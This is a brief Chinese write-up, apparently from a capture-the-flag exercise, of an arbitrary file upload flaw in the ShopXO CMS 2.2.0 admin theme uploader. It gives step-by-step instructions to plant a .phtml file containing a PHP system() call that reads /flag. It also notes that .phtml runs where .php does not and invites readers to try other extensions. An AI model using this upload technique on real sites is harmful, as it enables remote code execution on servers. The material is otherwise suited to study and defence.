ShopXO CMS 2.2.0. 后台管理页面存在任意文件上传漏洞 主题下载 主题下载 新建PHTML文件放入此目录下 default -> static 文件内容: <?php system('cat /flag'); echo 1234; ?> 上传到主题 图片无法加载,请检查网络。 访问成功 值得注意的是,使用修改为PHP文件,无法执行,只有phtml可以执行,大家可以试试还有什么后缀可以用。 反正我是脚本小子,我也不知道原理。 如果对你有用的话,关注就不要取消了!!!